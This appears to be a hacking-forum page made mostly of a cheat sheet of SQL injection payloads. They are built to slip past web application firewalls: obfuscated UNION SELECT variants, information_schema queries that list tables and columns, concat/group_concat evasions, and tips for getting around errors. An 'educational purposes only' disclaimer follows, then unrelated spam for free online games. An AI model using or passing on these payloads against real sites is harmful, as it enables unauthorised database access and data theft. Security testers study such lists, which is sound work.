union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

[~] after id no. like id=1 +/*!and*/+1=0 [~]
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
when the --+- or -- dosen't work use ;%00

bypass error 505
sometimes when union select ,sites become 505 or time out....
bypass-
-use brackets
union(select+1)
-use %0b or /**/ as space
union%0bselect

Note:

All information on this forum is for educational purposes only.

WE are not responsible for any attacks that are carried out on networks, websites or servers.

Read more...

Snow Bross Free Online Games

Play Snow Bros free Online

Read more...

Grand Theft Auto Full Game Free Play Online

 

Grand Theft Auto Full Game Free Play Online Is Now Available Here. GTA One Of The Top Popular Series Publisher By Rockstar Games And Enjoy To Play Everyone. Everyone Enjoy To Played This Series On Their Personal Computer But Now You Can Play Right Now. How To Play- Just Visit The Instruction Pages.

Wait Few Minutes To Loads Game Properly- 1% To 100% Complete To Start Click Play

 

Read more...

Mustapha Game Totally Free Play Online

Mustapha Game Free Play Online Is Right Now. Easily To Start And Enjoy To Play Right Here. Top Action Both Fighting DiversionLike To Play Everyone. Note: You Have To Need Good Internet Connection And Check Your Adobe Flash Player Before Start. Normally Control Key Used By Player1 Mode: WASD Move Key And HJK Action Key And Player2 Mode: Arrow Key Move And 123 Numeric Button Key.


 Mustapha Games Play Online Now

Read more...

Desperado Full Game Free Play Online

Wait Few Minutes To Loads Desperado Game Properly- 1% To 100% Complete To Start Click Play

Play Desperado

Read more...